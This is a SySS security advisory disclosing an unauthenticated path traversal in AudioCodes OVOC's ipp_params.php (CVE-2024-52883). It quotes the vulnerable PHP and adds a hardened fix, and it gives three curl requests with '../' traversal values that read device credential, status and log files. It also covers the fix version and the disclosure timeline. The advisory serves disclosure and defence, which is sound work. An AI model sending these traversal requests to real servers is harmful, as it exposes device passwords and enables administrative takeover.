Advisory ID: SYSS-2024-075
Product: One Voice Operations Center (OVOC)
Manufacturer: AudioCodes Ltd.
Affected Version(s): < 8.4.582
Tested Version(s): 8.2.3122
Vulnerability Type: Path Traversal (CWE-35)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2024-08-30
Solution Date: 2024-10-20
Public Disclosure: 2025-02-07
CVE Reference: CVE-2024-52883
Author of Advisory: Moritz Abrell, SySS GmbH
Nicola Staller, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
AudioCodes OVOC is used for central management and logging/monitoring of
AudioCodes devices.
The manufacturer describes the product as follows (see [1]):
"AudioCodes One Voice Operations Center (OVOC) is a voice network
management solution that combines management of voice network
devices and quality of experience monitoring into a single,
intuitive application. OVOC enables administrators to adopt a holistic
approach to network lifecycle management by simplifying everyday tasks
and assisting in troubleshooting all the way from detection to correction.
OVOC can be deployed in service provider and enterprise networks and
supports end-to-end quality of experience monitoring in Microsoft Teams
environments.
OVOC provides IT staff with single pane of glass through which they can
manage and monitor VoIP devices and elements from a single centralized
location, saving time and costs. Tasks normally considered to be complex
and time-consuming, such as performing root cause analysis, provisioning
new devices and initiating bulk software updates, can now be carried out
simply and rapidly. OVOC’s open APIs enable integration with 3rd party
applications to provide additional functionality such as enhanced voice
analytics and data-layer monitoring."
Due to a path traversal vulnerability, sensitive data can be read without
any authentication.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The PHP application at the web path "/ipp/admin/AudioCodes_files/ipp_params.php"
of OVOC can be accessed without any authentication and is vulnerable to path
traversal.
Vulnerable code section:
#########################
// "name" is read from the query string without any validation
$name = $_GET['name'];
// the user-controlled value is concatenated directly into the file path
$filename = empty($name) ? 'ipp_params.csv' : 'files/ac/'.$name.'.csv';
echo "\n\n";
$f = fopen($filename, "r");
while (($line = fgetcsv($f)) !== false) {
    echo "";
    foreach ($line as $cell) {
        echo "" . htmlspecialchars($cell) . " | ";
    }
    echo "\n";
}
fclose($f);
echo "\n";
#########################
This allows path traversal via the GET parameter "name", and therefore
access to any file with a ".csv" extension.
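
For comparison, a hardened form of the same file lookup, added here as an example; it is not AudioCodes code and not necessarily how version 8.4.582 fixes the issue. The helper name resolve_csv(), the BASE_DIR constant, the allowed-name pattern and the HTML table output are assumptions. It covers only the path handling; the missing authentication on the script is a separate problem.

```php
<?php
// Added example, not AudioCodes code. resolve_csv() and the name pattern are
// assumptions; BASE_DIR mirrors the 'files/ac/' prefix of the quoted snippet.
const BASE_DIR = __DIR__ . '/files/ac';

function resolve_csv(string $name, string $baseDir = BASE_DIR): ?string
{
    // 1. Allow-list a plain file stem: no '/', '\', '.', or NUL bytes.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // 2. Canonicalise: realpath() resolves '..' and symlinks and returns
    //    false when the target does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.csv');
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must still be inside the base
    //    directory, which also covers a symlink placed under files/ac/.
    $prefix = rtrim($base, '/') . '/';
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

$name = $_GET['name'] ?? '';
if ($name === '') {
    $filename = __DIR__ . '/ipp_params.csv';   // default file, as in the original
} else {
    // name[]=x arrives as an array; only strings are candidates
    $filename = is_string($name) ? resolve_csv($name) : null;
}
$f = $filename === null ? false : @fopen($filename, 'r');
if ($f === false) {
    http_response_code(404);   // same answer for "rejected" and "missing"
    exit;
}
echo "<table>\n";
while (($line = fgetcsv($f, null, ',', '"', '\\')) !== false) {
    echo '<tr>';
    foreach ($line as $cell) {
        echo '<td>' . htmlspecialchars((string) $cell) . '</td>';
    }
    echo "</tr>\n";
}
fclose($f);
echo "</table>\n";
```

The allow-list alone already rejects every "name" value used in the PoC requests; the realpath() containment check is a second layer in case the pattern is later relaxed.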
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Example #1:
Accessing the topology view:
#> curl -v "https://<host>/ipp/admin/AudioCodes_files/ipp_params.php?name=../../../../../../ACEMS/NBIF/topology/MGsTopologyList"
Note: This file contains sensitive information such as encrypted
passwords of assigned devices, e.g. Session Border Controllers.
In combination with the hardcoded key (see SYSS-2024-079[4]),
an unauthenticated attacker is able to extract sensitive
information, decrypt it and gain administrative rights
on assigned devices.
Example #2:
Accessing a device's status:
#> curl -v "https://<host>/ipp/admin/AudioCodes_files/ipp_params.php?name=../../../../../../ACEMS/NBIF/ippmanager/tmp/ExportDevicesStatus"
Example #3:
Accessing the activity log:
#> curl -v "https://<host>/ipp/admin/AudioCodes_files/ipp_params.php?name=../../../../../../../var/log/ems/Activity/IPP_activity_log"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The manufacturer recommends updating to OVOC version 8.4.582.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2024-08-27: Vulnerability discovered
2024-08-30: Vulnerability reported to manufacturer
2024-09-02: Asked manufacturer to confirm receipt
2024-09-02: Manufacturer confirmed receipt
2024-09-18: Requested a status update from the manufacturer
2024-09-19: Manufacturer responded with the investigation state of other
reported vulnerabilities; SYSS-2024-075 is not mentioned
2024-09-24: Asked manufacturer about the state of SYSS-2024-075
2024-09-24: Manufacturer responded that SYSS-2024-075 has been forwarded to the
development team
2024-10-02: Manufacturer mentioned that a fix is planned for the next
software release
2024-10-29: Manufacturer stated that a fix was released on October 20, 2024;
fixed version: 8.4.582
2024-10-29: Noticed that the vulnerability is not mentioned in the
release notes[5]; asked the manufacturer about the state
2024-10-29: Manufacturer mentioned that the vulnerability is marked as
"internal" and not referenced publicly
2024-11-18: Informed manufacturer about the assigned CVE-ID: CVE-2024-52883
2025-01-31: Asked the manufacturer again for references in the release notes
2025-02-07: Public disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] AudioCodes OVOC product website
https://www.audiocodes.com/solutions-products/products/management-products-solutions/one-voice-operations-center
[2] SySS Security Advisory SYSS-2024-075
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-075.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
[4] SySS Security Advisory SYSS-2024-079
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-079.txt
[5] OVOC release notes
https://www.audiocodes.com/media/bnabwtog/audiocodes-one-voice-operations-center-release-notes-ver-84.pdf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Moritz Abrell and Nicola Staller of SySS GmbH.
E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53
E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en